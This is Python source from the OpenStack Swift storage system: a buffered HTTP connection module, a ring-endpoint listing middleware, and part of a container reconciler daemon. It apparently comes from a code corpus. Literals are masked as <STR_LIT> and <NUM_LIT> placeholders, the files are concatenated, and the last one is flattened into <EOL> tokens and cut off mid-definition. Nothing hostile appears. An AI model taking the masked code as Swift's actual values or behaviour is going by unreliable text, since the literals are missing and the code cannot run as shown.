            return HTTPResponse.read(self, amt)
        if amt is None:
            buffered = self._readline_buffer
            self._readline_buffer = '<STR_LIT>'
            return buffered + HTTPResponse.read(self, amt)
        elif amt <= len(self._readline_buffer):
            # Entire request satisfied from the buffer.
            res = self._readline_buffer[:amt]
            self._readline_buffer = self._readline_buffer[amt:]
            return res
        else:
            smaller_amt = amt - len(self._readline_buffer)
            buf = self._readline_buffer
            self._readline_buffer = '<STR_LIT>'
            return buf + HTTPResponse.read(self, smaller_amt)

    def readline(self, size=<NUM_LIT>):
        """Return one newline-terminated line, buffering any overshoot."""
        while ('<STR_LIT:\n>' not in self._readline_buffer
               and len(self._readline_buffer) < size):
            read_size = size - len(self._readline_buffer)
            chunk = HTTPResponse.read(self, read_size)
            if not chunk:
                break
            self._readline_buffer += chunk
        line, newline, rest = self._readline_buffer.partition('<STR_LIT:\n>')
        self._readline_buffer = rest
        return line + newline

    def nuke_from_orbit(self):
        """Close the underlying OS-level socket, bypassing graceful shutdown."""
        if self._real_socket:
            self._real_socket.close()
        self._real_socket = None
        self.close()

    def close(self):
        HTTPResponse.close(self)
        self.sock = None
        self._real_socket = None


class BufferedHTTPConnection(HTTPConnection):
    """HTTPConnection producing BufferedHTTPResponse and timing requests."""

    response_class = BufferedHTTPResponse

    def connect(self):
        self._connected_time = time.time()
        ret = HTTPConnection.connect(self)
        # Disable Nagle: these requests are latency-sensitive.
        self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, <NUM_LIT:1>)
        return ret

    def putrequest(self, method, url, skip_host=<NUM_LIT:0>, skip_accept_encoding=<NUM_LIT:0>):
        # Remember method/path for the timing log in getresponse().
        self._method = method
        self._path = url
        return HTTPConnection.putrequest(self, method, url, skip_host,
                                         skip_accept_encoding)

    def getexpect(self):
        """Return a response object for the 100-continue handshake."""
        response = BufferedHTTPResponse(self.sock, strict=self.strict,
                                        method=self._method)
        response.expect_response()
        return response

    def getresponse(self):
        response = HTTPConnection.getresponse(self)
        logging.debug("<STR_LIT>"
                      "<STR_LIT>",
                      {'<STR_LIT:time>': time.time() - self._connected_time,
                       '<STR_LIT>': self._method, '<STR_LIT:host>': self.host,
                       '<STR_LIT:port>': self.port, '<STR_LIT:path>': self._path})
        return response


def http_connect(ipaddr, port, device, partition, method, path,
                 headers=None, query_string=None, ssl=False):
    """Build the /device/partition/path URL, quote it, and connect."""
    if isinstance(path, six.text_type):
        try:
            path = path.encode("<STR_LIT:utf-8>")
        except UnicodeError as e:
            logging.exception(_('<STR_LIT>'), str(e))
    if isinstance(device, six.text_type):
        try:
            device = device.encode("<STR_LIT:utf-8>")
        except UnicodeError as e:
            logging.exception(_('<STR_LIT>'), str(e))
    path = quote('<STR_LIT:/>' + device + '<STR_LIT:/>' + str(partition) + path)
    return http_connect_raw(
        ipaddr, port, method, path, headers, query_string, ssl)


def http_connect_raw(ipaddr, port, method, path, headers=None,
                     query_string=None, ssl=False):
    """Open an HTTP(S) connection and send the request line and headers."""
    if not port:
        port = <NUM_LIT> if ssl else <NUM_LIT>
    if ssl:
        conn = HTTPSConnection('<STR_LIT>' % (ipaddr, port))
    else:
        conn = BufferedHTTPConnection('<STR_LIT>' % (ipaddr, port))
    if query_string:
        path += '<STR_LIT:?>' + query_string
    conn.path = path
    # Skip the Host header only when the caller provided one explicitly.
    conn.putrequest(method, path, skip_host=(headers and '<STR_LIT>' in headers))
    if headers:
        for header, value in headers.items():
            conn.putheader(header, str(value))
    conn.endheaders()
    return conn
"""Middleware exposing ring endpoint lookups for accounts/containers/objects."""
import json

from six.moves.urllib.parse import quote, unquote

from swift.common.ring import Ring
from swift.common.utils import get_logger, split_path
from swift.common.swob import Request, Response
from swift.common.swob import HTTPBadRequest, HTTPMethodNotAllowed
from swift.common.storage_policy import POLICIES
from swift.proxy.controllers.base import get_container_info

# Response format versions this middleware can produce.
RESPONSE_VERSIONS = (<NUM_LIT:1.0>, <NUM_LIT>)


class ListEndpointsMiddleware(object):
    """Answers GET requests under endpoints_path with ring node endpoints."""

    def __init__(self, app, conf):
        self.app = app
        self.logger = get_logger(conf, log_route='<STR_LIT>')
        self.swift_dir = conf.get('<STR_LIT>', '<STR_LIT>')
        self.account_ring = Ring(self.swift_dir, ring_name='<STR_LIT>')
        self.container_ring = Ring(self.swift_dir, ring_name='<STR_LIT>')
        self.endpoints_path = conf.get('<STR_LIT>', '<STR_LIT>')
        # Normalize so prefix matching and slicing below are consistent.
        if not self.endpoints_path.endswith('<STR_LIT:/>'):
            self.endpoints_path += '<STR_LIT:/>'
        self.default_response_version = <NUM_LIT:1.0>
        # Version -> formatter dispatch table.
        self.response_map = {
            <NUM_LIT:1.0>: self.v1_format_response,
            <NUM_LIT>: self.v2_format_response,
        }

    def get_object_ring(self, policy_idx):
        """Return the object ring for the given storage policy index."""
        return POLICIES.get_object_ring(policy_idx, self.swift_dir)

    def _parse_version(self, raw_version):
        """Parse a 'vX.Y'-style segment to float; ValueError if unsupported."""
        err_msg = '<STR_LIT>' % raw_version
        try:
            version = float(raw_version.lstrip('<STR_LIT:v>'))
        except ValueError:
            raise ValueError(err_msg)
        if not any(version == v for v in RESPONSE_VERSIONS):
            raise ValueError(err_msg)
        return version

    def _parse_path(self, request):
        """Split the request path into (version, account, container, obj).

        Raises ValueError when the path cannot be parsed.
        """
        clean_path = request.path[len(self.endpoints_path) - <NUM_LIT:1>:]
        try:
            raw_version, rest = split_path(clean_path, <NUM_LIT:1>, <NUM_LIT:2>, True)
        except ValueError:
            raise ValueError('<STR_LIT>')
        try:
            version = self._parse_version(raw_version)
        except ValueError:
            if raw_version.startswith('<STR_LIT:v>') and '<STR_LIT:_>' not in raw_version:
                # Looked like a version segment but isn't supported.
                raise
            # No version segment: treat the whole path as unversioned.
            version = self.default_response_version
            rest = clean_path
        else:
            rest = '<STR_LIT:/>' + rest if rest else '<STR_LIT:/>'
        try:
            account, container, obj = split_path(rest, <NUM_LIT:1>, <NUM_LIT:3>, True)
        except ValueError:
            raise ValueError('<STR_LIT>')
        return version, account, container, obj

    def v1_format_response(self, req, endpoints, **kwargs):
        """v1: a bare JSON list of endpoint URLs."""
        return Response(json.dumps(endpoints),
                        content_type='<STR_LIT:application/json>')

    def v2_format_response(self, req, endpoints, storage_policy_index,
                           **kwargs):
        """v2: JSON object with the endpoints plus header metadata."""
        resp = {
            '<STR_LIT>': endpoints,
            '<STR_LIT>': {},
        }
        if storage_policy_index is not None:
            resp['<STR_LIT>'][
                '<STR_LIT>'] = str(storage_policy_index)
        return Response(json.dumps(resp),
                        content_type='<STR_LIT:application/json>')

    def __call__(self, env, start_response):
        request = Request(env)
        if not request.path.startswith(self.endpoints_path):
            # Not ours: pass through to the next app.
            return self.app(env, start_response)
        if request.method != '<STR_LIT:GET>':
            return HTTPMethodNotAllowed(
                req=request, headers={"<STR_LIT>": "<STR_LIT:GET>"})(env, start_response)
        try:
            version, account, container, obj = self._parse_path(request)
        except ValueError as err:
            return HTTPBadRequest(str(err))(env, start_response)
        if account is not None:
            account = unquote(account)
        if container is not None:
            container = unquote(container)
        if obj is not None:
            obj = unquote(obj)
        storage_policy_index = None
        if obj is not None:
            # Objects need the container's policy to choose the right ring.
            container_info = get_container_info(
                {'<STR_LIT>': '<STR_LIT>' % (account, container)},
                self.app, swift_source='<STR_LIT>')
            storage_policy_index = container_info['<STR_LIT>']
            obj_ring = self.get_object_ring(storage_policy_index)
            partition, nodes = obj_ring.get_nodes(
                account, container, obj)
            endpoint_template = '<STR_LIT>' + '<STR_LIT>'
        elif container is not None:
            partition, nodes = self.container_ring.get_nodes(
                account, container)
            endpoint_template = '<STR_LIT>' + '<STR_LIT>'
        else:
            partition, nodes = self.account_ring.get_nodes(
                account)
            endpoint_template = '<STR_LIT>' + '<STR_LIT>'
        endpoints = []
        for node in nodes:
            endpoint = endpoint_template.format(
                ip=node['<STR_LIT>'],
                port=node['<STR_LIT:port>'],
                device=node['<STR_LIT>'],
                partition=partition,
                account=quote(account),
                container=quote(container or '<STR_LIT>'),
                obj=quote(obj or '<STR_LIT>'))
            endpoints.append(endpoint)
        resp = self.response_map[version](
            request, endpoints=endpoints,
            storage_policy_index=storage_policy_index)
        return resp(env, start_response)


def filter_factory(global_conf, **local_conf):
    """paste.deploy entry point."""
    conf = global_conf.copy()
    conf.update(local_conf)

    def list_endpoints_filter(app):
        return ListEndpointsMiddleware(app, conf)
    return list_endpoints_filter
<s> import time <EOL> from collections import defaultdict <EOL> import socket <EOL> import itertools <EOL> import logging <EOL> from eventlet import GreenPile , GreenPool , Timeout <EOL> from swift . common import constraints <EOL> from swift . common . daemon import Daemon <EOL> from swift . common . direct_client import ( <EOL> direct_head_container , direct_delete_container_object , <EOL> direct_put_container_object , ClientException ) <EOL> from swift . common . internal_client import InternalClient , UnexpectedResponse <EOL> from swift . common . utils import get_logger , split_path , quorum_size , FileLikeIter , Timestamp , last_modified_date_to_timestamp , LRUCache , decode_timestamps <EOL> MISPLACED_OBJECTS_ACCOUNT = '<STR_LIT>' <EOL> MISPLACED_OBJECTS_CONTAINER_DIVISOR = <NUM_LIT> <EOL> CONTAINER_POLICY_TTL = <NUM_LIT:30> <EOL> def cmp_policy_info ( info , remote_info ) : <EOL> """<STR_LIT>""" <EOL> def is_deleted ( info ) : <EOL> return ( info [ '<STR_LIT>' ] > info [ '<STR_LIT>' ] and <EOL> info . get ( '<STR_LIT:count>' , info . 
get ( '<STR_LIT>' , <NUM_LIT:0> ) ) == <NUM_LIT:0> ) <EOL> deleted = is_deleted ( info ) <EOL> remote_deleted = is_deleted ( remote_info ) <EOL> if any ( [ deleted , remote_deleted ] ) : <EOL> if not deleted : <EOL> return - <NUM_LIT:1> <EOL> elif not remote_deleted : <EOL> return <NUM_LIT:1> <EOL> return cmp ( remote_info [ '<STR_LIT>' ] , <EOL> info [ '<STR_LIT>' ] ) <EOL> def has_been_recreated ( info ) : <EOL> return ( info [ '<STR_LIT>' ] > info [ '<STR_LIT>' ] > <EOL> Timestamp ( <NUM_LIT:0> ) ) <EOL> remote_recreated = has_been_recreated ( remote_info ) <EOL> recreated = has_been_recreated ( info ) <EOL> if any ( [ remote_recreated , recreated ] ) : <EOL> if not recreated : <EOL> return <NUM_LIT:1> <EOL> elif not remote_recreated : <EOL> return - <NUM_LIT:1> <EOL> return cmp ( remote_info [ '<STR_LIT>' ] , <EOL> info [ '<STR_LIT>' ] ) <EOL> return cmp ( info [ '<STR_LIT>' ] , remote_info [ '<STR_LIT>' ] ) <EOL> def incorrect_policy_index ( info , remote_info ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in remote_info : <EOL> return False <EOL> if remote_info [ '<STR_LIT>' ] == info [ '<STR_LIT>' ] : <EOL> return False <EOL> return info [ '<STR_LIT>' ] != sorted ( <EOL> [ info , remote_info ] , cmp = cmp_policy_info ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> def translate_container_headers_to_info ( headers ) : <EOL> default_timestamp = Timestamp ( <NUM_LIT:0> ) . internal <EOL> return { <EOL> '<STR_LIT>' : int ( headers [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : headers . get ( '<STR_LIT>' , <EOL> default_timestamp ) , <EOL> '<STR_LIT>' : headers . get ( '<STR_LIT>' , <EOL> default_timestamp ) , <EOL> '<STR_LIT>' : headers . get ( '<STR_LIT>' , <EOL> default_timestamp ) , <EOL> } <EOL> def best_policy_index ( headers ) : <EOL> container_info = map ( translate_container_headers_to_info , headers ) <EOL> container_info . 
sort ( cmp = cmp_policy_info ) <EOL> return container_info [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> def get_reconciler_container_name ( obj_timestamp ) : <EOL> """<STR_LIT>""" <EOL> _junk , _junk , ts_meta = decode_timestamps ( obj_timestamp ) <EOL> return str ( int ( ts_meta ) // <EOL> MISPLACED_OBJECTS_CONTAINER_DIVISOR * <EOL> MISPLACED_OBJECTS_CONTAINER_DIVISOR ) <EOL> def get_reconciler_obj_name ( policy_index , account , container , obj ) : <EOL> return "<STR_LIT>" % { <EOL> '<STR_LIT>' : policy_index , '<STR_LIT>' : account , <EOL> '<STR_LIT>' : container , '<STR_LIT>' : obj } <EOL> def get_reconciler_content_type ( op ) : <EOL> try : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } [ op . lower ( ) ] <EOL> except KeyError : <EOL> raise ValueError ( '<STR_LIT>' % op ) <EOL> def get_row_to_q_entry_translator ( broker ) : <EOL> account = broker . account <EOL> container = broker . container <EOL> op_type = { <EOL> <NUM_LIT:0> : get_reconciler_content_type ( '<STR_LIT>' ) , <EOL> <NUM_LIT:1> : get_reconciler_content_type ( '<STR_LIT>' ) , <EOL> } <EOL> def translator ( obj_info ) : <EOL> name = get_reconciler_obj_name ( obj_info [ '<STR_LIT>' ] , <EOL> account , container , <EOL> obj_info [ '<STR_LIT:name>' ] ) <EOL> return { <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : obj_info [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : obj_info [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : op_type [ obj_info [ '<STR_LIT>' ] ] , <EOL> '<STR_LIT:size>' : <NUM_LIT:0> , <EOL> } <EOL> return translator <EOL> def add_to_reconciler_queue ( container_ring , account , container , obj , <EOL> obj_policy_index , obj_timestamp , op , <EOL> force = False , conn_timeout = <NUM_LIT:5> , response_timeout = <NUM_LIT:15> ) : <EOL> """<STR_LIT>""" <EOL> container_name = get_reconciler_container_name ( obj_timestamp ) <EOL> object_name = get_reconciler_obj_name ( obj_policy_index , account , <EOL> container , obj ) <EOL> if force 
: <EOL> x_timestamp = Timestamp ( time . time ( ) ) . internal <EOL> else : <EOL> x_timestamp = obj_timestamp <EOL> q_op_type = get_reconciler_content_type ( op ) <EOL> headers = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : obj_timestamp , <EOL> '<STR_LIT>' : x_timestamp , <EOL> '<STR_LIT>' : q_op_type , <EOL> } <EOL> def _check_success ( * args , ** kwargs ) : <EOL> try : <EOL> direct_put_container_object ( * args , ** kwargs ) <EOL> return <NUM_LIT:1> <EOL> except ( ClientException , Timeout , socket . error ) : <EOL> return <NUM_LIT:0> <EOL> pile = GreenPile ( ) <EOL> part , nodes = container_ring . get_nodes ( MISPLACED_OBJECTS_ACCOUNT , <EOL> container_name ) <EOL> for node in nodes : <EOL> pile . spawn ( _check_success , node , part , MISPLACED_OBJECTS_ACCOUNT , <EOL> container_name , object_name , headers = headers , <EOL> conn_timeout = conn_timeout , <EOL> response_timeout = response_timeout ) <EOL> successes = sum ( pile ) <EOL> if successes >= quorum_size ( len ( nodes ) ) : <EOL> return container_name <EOL> else : <EOL> return False <EOL> def slightly_later_timestamp ( ts , offset = <NUM_LIT:1> ) : <EOL> return Timestamp ( ts , offset = offset ) . internal <EOL> def parse_raw_obj ( obj_info ) : <EOL> """<STR_LIT>""" <EOL> raw_obj_name = obj_info [ '<STR_LIT:name>' ] . encode ( '<STR_LIT:utf-8>' ) <EOL> policy_index , obj_name = raw_obj_name . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> q_policy_index = int ( policy_index ) <EOL> account , container , obj = split_path ( obj_name , <NUM_LIT:3> , <NUM_LIT:3> , rest_with_last = True ) <EOL> try : <EOL> q_op = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } [ obj_info [ '<STR_LIT>' ] ] <EOL> except KeyError : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> obj_info . 
get ( '<STR_LIT>' , None ) ) <EOL> return { <EOL> '<STR_LIT>' : q_policy_index , <EOL> '<STR_LIT>' : account , <EOL> '<STR_LIT>' : container , <EOL> '<STR_LIT>' : obj , <EOL> '<STR_LIT>' : q_op , <EOL> '<STR_LIT>' : decode_timestamps ( ( obj_info [ '<STR_LIT>' ] ) ) [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : last_modified_date_to_timestamp ( <EOL> obj_info [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT:path>' : '<STR_LIT>' % ( account , container , obj ) <EOL> } <EOL> @ LRUCache ( maxtime = CONTAINER_POLICY_TTL ) <EOL> def direct_get_container_policy_index ( container_ring , account_name , <EOL> container_name ) : <EOL> """<STR_LIT>""" <EOL> def _eat_client_exception ( * args ) : <EOL> try : <EOL> return direct_head_container ( * args ) <EOL> except ClientException as err : <EOL> if err . http_status == <NUM_LIT> : <EOL> return err . http_headers <EOL> except ( Timeout , socket . error ) : <EOL> pass <EOL> pile = GreenPile ( ) <EOL> part , nodes = container_ring . get_nodes ( account_name , container_name ) <EOL> for node in nodes : <EOL> pile . spawn ( _eat_client_exception , node , part , account_name , <EOL> container_name ) <EOL> headers = [ x for x in pile if x is not None ] <EOL> if len ( headers ) < quorum_size ( len ( nodes ) ) : <EOL> return <EOL> return best_policy_index ( headers ) <EOL> def direct_delete_container_entry ( container_ring , account_name , container_name , <EOL> object_name , headers = None ) : <EOL> """<STR_LIT>""" <EOL> pool = GreenPool ( ) <EOL> part , nodes = container_ring . get_nodes ( account_name , container_name ) <EOL> for node in nodes : <EOL> pool . spawn_n ( direct_delete_container_object , node , part , account_name , <EOL> container_name , object_name , headers = headers ) <EOL> pool . waitall ( ) <EOL> class ContainerReconciler ( Daemon ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , conf ) : <EOL> self . conf = conf <EOL> self . reclaim_age = int ( conf . get ( '<STR_LIT>' , <NUM_LIT> * <NUM_LIT:7> ) ) <EOL> self . 
interval = int ( conf . get ( '<STR_LIT>' , <NUM_LIT:30> ) ) <EOL> conf_path = conf . get ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> self . logger = get_logger ( conf , log_route = '<STR_LIT>' ) <EOL> request_tries = int ( conf . get ( '<STR_LIT>' ) or <NUM_LIT:3> ) <EOL> self . swift = InternalClient ( conf_path , <EOL> '<STR_LIT>' , <EOL> request_tries ) <EOL> self . stats = defaultdict ( int ) <EOL> self . last_stat_time = time . time ( ) <EOL> def stats_log ( self , metric , msg , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> level = kwargs . pop ( '<STR_LIT>' , logging . DEBUG ) <EOL> log_message = '<STR_LIT>' % metric + msg <EOL> self . logger . log ( level , log_message , * args , ** kwargs ) <EOL> self . stats [ metric ] += <NUM_LIT:1> <EOL> def log_stats ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> now = time . time ( ) <EOL> should_log = force or ( now - self . last_stat_time > <NUM_LIT> ) <EOL> if should_log : <EOL> self . last_stat_time = now <EOL> self . logger . info ( '<STR_LIT>' , dict ( ** self . stats ) ) <EOL> def pop_queue ( self , container , obj , q_ts , q_record ) : <EOL> """<STR_LIT>""" <EOL> q_path = '<STR_LIT>' % ( MISPLACED_OBJECTS_ACCOUNT , container , obj ) <EOL> x_timestamp = slightly_later_timestamp ( max ( q_record , q_ts ) ) <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' , <EOL> q_path , q_ts , x_timestamp ) <EOL> headers = { '<STR_LIT>' : x_timestamp } <EOL> direct_delete_container_entry ( <EOL> self . swift . container_ring , MISPLACED_OBJECTS_ACCOUNT , <EOL> container , obj , headers = headers ) <EOL> def throw_tombstones ( self , account , container , obj , timestamp , <EOL> policy_index , path ) : <EOL> """<STR_LIT>""" <EOL> x_timestamp = slightly_later_timestamp ( timestamp ) <EOL> self . 
stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> path , timestamp , policy_index , x_timestamp ) <EOL> headers = { <EOL> '<STR_LIT>' : x_timestamp , <EOL> '<STR_LIT>' : policy_index , <EOL> } <EOL> success = False <EOL> try : <EOL> self . swift . delete_object ( account , container , obj , <EOL> acceptable_statuses = ( <NUM_LIT:2> , <NUM_LIT> ) , <EOL> headers = headers ) <EOL> except UnexpectedResponse as err : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , timestamp , <EOL> policy_index , err ) <EOL> else : <EOL> success = True <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , timestamp , <EOL> policy_index ) <EOL> return success <EOL> def _reconcile_object ( self , account , container , obj , q_policy_index , q_ts , <EOL> q_op , path , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> container_policy_index = direct_get_container_policy_index ( <EOL> self . swift . container_ring , account , container ) <EOL> if container_policy_index is None : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> path , q_ts ) <EOL> return False <EOL> if container_policy_index == q_policy_index : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , q_ts , <EOL> container_policy_index , q_policy_index ) <EOL> return True <EOL> self . logger . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' , path , q_ts , <EOL> container_policy_index ) <EOL> headers = { <EOL> '<STR_LIT>' : container_policy_index } <EOL> dest_obj = self . swift . get_object_metadata ( account , container , obj , <EOL> headers = headers , <EOL> acceptable_statuses = ( <NUM_LIT:2> , <NUM_LIT:4> ) ) <EOL> dest_ts = Timestamp ( dest_obj . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> if dest_ts >= q_ts : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , dest_ts , <EOL> container_policy_index , q_ts ) <EOL> return self . 
throw_tombstones ( account , container , obj , q_ts , <EOL> q_policy_index , path ) <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , q_ts , <EOL> q_policy_index , container_policy_index ) <EOL> self . logger . debug ( '<STR_LIT>' , path , <EOL> q_ts , q_policy_index ) <EOL> headers = { <EOL> '<STR_LIT>' : q_policy_index } <EOL> try : <EOL> source_obj_status , source_obj_info , source_obj_iter = self . swift . get_object ( account , container , obj , <EOL> headers = headers , <EOL> acceptable_statuses = ( <NUM_LIT:2> , <NUM_LIT:4> ) ) <EOL> except UnexpectedResponse as err : <EOL> source_obj_status = err . resp . status_int <EOL> source_obj_info = { } <EOL> source_obj_iter = None <EOL> source_ts = Timestamp ( source_obj_info . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> if source_obj_status == <NUM_LIT> and q_op == '<STR_LIT>' : <EOL> return self . ensure_tombstone_in_right_location ( <EOL> q_policy_index , account , container , obj , q_ts , path , <EOL> container_policy_index , source_ts ) <EOL> else : <EOL> return self . ensure_object_in_right_location ( <EOL> q_policy_index , account , container , obj , q_ts , path , <EOL> container_policy_index , source_ts , source_obj_status , <EOL> source_obj_info , source_obj_iter ) <EOL> def ensure_object_in_right_location ( self , q_policy_index , account , <EOL> container , obj , q_ts , path , <EOL> container_policy_index , source_ts , <EOL> source_obj_status , source_obj_info , <EOL> source_obj_iter , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if source_obj_status // <NUM_LIT:100> != <NUM_LIT:2> or source_ts < q_ts : <EOL> if q_ts < time . time ( ) - self . reclaim_age : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , <EOL> q_ts . internal , q_policy_index , <EOL> level = logging . CRITICAL ) <EOL> return True <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , <EOL> q_ts . internal , q_policy_index , source_obj_status , <EOL> source_ts . 
internal , level = logging . WARNING ) <EOL> return False <EOL> ts = max ( Timestamp ( source_ts ) , q_ts ) <EOL> put_timestamp = slightly_later_timestamp ( ts , offset = <NUM_LIT:2> ) <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , source_ts , <EOL> q_policy_index , container_policy_index , put_timestamp ) <EOL> headers = source_obj_info . copy ( ) <EOL> headers [ '<STR_LIT>' ] = container_policy_index <EOL> headers [ '<STR_LIT>' ] = put_timestamp <EOL> try : <EOL> self . swift . upload_object ( <EOL> FileLikeIter ( source_obj_iter ) , account , container , obj , <EOL> headers = headers ) <EOL> except UnexpectedResponse as err : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , path , source_ts , q_policy_index , <EOL> container_policy_index , err , level = logging . WARNING ) <EOL> return False <EOL> except : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , <EOL> source_ts , q_policy_index , container_policy_index , <EOL> level = logging . ERROR , exc_info = True ) <EOL> return False <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , source_ts , <EOL> q_policy_index , container_policy_index , put_timestamp ) <EOL> return self . throw_tombstones ( account , container , obj , q_ts , <EOL> q_policy_index , path ) <EOL> def ensure_tombstone_in_right_location ( self , q_policy_index , account , <EOL> container , obj , q_ts , path , <EOL> container_policy_index , source_ts , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> delete_timestamp = slightly_later_timestamp ( q_ts , offset = <NUM_LIT:2> ) <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , <EOL> source_ts , q_policy_index , container_policy_index , <EOL> delete_timestamp ) <EOL> headers = { <EOL> '<STR_LIT>' : container_policy_index , <EOL> '<STR_LIT>' : delete_timestamp , <EOL> } <EOL> try : <EOL> self . swift . 
delete_object ( account , container , obj , <EOL> headers = headers ) <EOL> except UnexpectedResponse as err : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , <EOL> source_ts , container_policy_index , <EOL> delete_timestamp , err , level = logging . WARNING ) <EOL> return False <EOL> except : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , source_ts , <EOL> container_policy_index , delete_timestamp , <EOL> level = logging . ERROR , exc_info = True ) <EOL> return False <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , source_ts , <EOL> container_policy_index , delete_timestamp , <EOL> level = logging . INFO ) <EOL> return self . throw_tombstones ( account , container , obj , q_ts , <EOL> q_policy_index , path ) <EOL> def reconcile_object ( self , info ) : <EOL> """<STR_LIT>""" <EOL> self . logger . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' , info [ '<STR_LIT:path>' ] , <EOL> info [ '<STR_LIT>' ] , info [ '<STR_LIT>' ] ) <EOL> success = False <EOL> try : <EOL> success = self . _reconcile_object ( ** info ) <EOL> except : <EOL> self . logger . exception ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> info [ '<STR_LIT:path>' ] , info [ '<STR_LIT>' ] , <EOL> info [ '<STR_LIT>' ] ) <EOL> if success : <EOL> metric = '<STR_LIT:success>' <EOL> msg = '<STR_LIT>' <EOL> else : <EOL> metric = '<STR_LIT>' <EOL> msg = '<STR_LIT>' <EOL> msg = '<STR_LIT>' + msg <EOL> self . stats_log ( metric , msg , info , level = logging . INFO ) <EOL> self . log_stats ( ) <EOL> return success <EOL> def _iter_containers ( self ) : <EOL> """<STR_LIT>""" <EOL> current_container = get_reconciler_container_name ( time . time ( ) ) <EOL> yield current_container <EOL> container_gen = self . swift . iter_containers ( MISPLACED_OBJECTS_ACCOUNT ) <EOL> self . logger . debug ( '<STR_LIT>' , <EOL> MISPLACED_OBJECTS_ACCOUNT ) <EOL> while True : <EOL> one_page = None <EOL> try : <EOL> one_page = list ( itertools . 
islice ( <EOL> container_gen , constraints . CONTAINER_LISTING_LIMIT ) ) <EOL> except UnexpectedResponse as err : <EOL> self . logger . error ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> MISPLACED_OBJECTS_ACCOUNT , err ) <EOL> if not one_page : <EOL> break <EOL> for c in reversed ( one_page ) : <EOL> container = c [ '<STR_LIT:name>' ] . encode ( '<STR_LIT:utf8>' ) <EOL> if container == current_container : <EOL> continue <EOL> yield container <EOL> def _iter_objects ( self , container ) : <EOL> """<STR_LIT>""" <EOL> self . logger . debug ( '<STR_LIT>' , container ) <EOL> found_obj = False <EOL> try : <EOL> for raw_obj in self . swift . iter_objects ( <EOL> MISPLACED_OBJECTS_ACCOUNT , container ) : <EOL> found_obj = True <EOL> yield raw_obj <EOL> except UnexpectedResponse as err : <EOL> self . logger . error ( '<STR_LIT>' , <EOL> container , err ) <EOL> if float ( container ) < time . time ( ) - self . reclaim_age and not found_obj : <EOL> self . swift . delete_container ( <EOL> MISPLACED_OBJECTS_ACCOUNT , container , <EOL> acceptable_statuses = ( <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> def reconcile ( self ) : <EOL> """<STR_LIT>""" <EOL> self . logger . debug ( '<STR_LIT>' ) <EOL> for container in self . _iter_containers ( ) : <EOL> for raw_obj in self . _iter_objects ( container ) : <EOL> try : <EOL> obj_info = parse_raw_obj ( raw_obj ) <EOL> except Exception : <EOL> self . stats_log ( '<STR_LIT>' , <EOL> '<STR_LIT>' , raw_obj , <EOL> level = logging . ERROR , exc_info = True ) <EOL> continue <EOL> finished = self . reconcile_object ( obj_info ) <EOL> if finished : <EOL> self . pop_queue ( container , raw_obj [ '<STR_LIT:name>' ] , <EOL> obj_info [ '<STR_LIT>' ] , <EOL> obj_info [ '<STR_LIT>' ] ) <EOL> self . log_stats ( ) <EOL> self . logger . debug ( '<STR_LIT>' , container ) <EOL> def run_once ( self , * args , ** kwargs 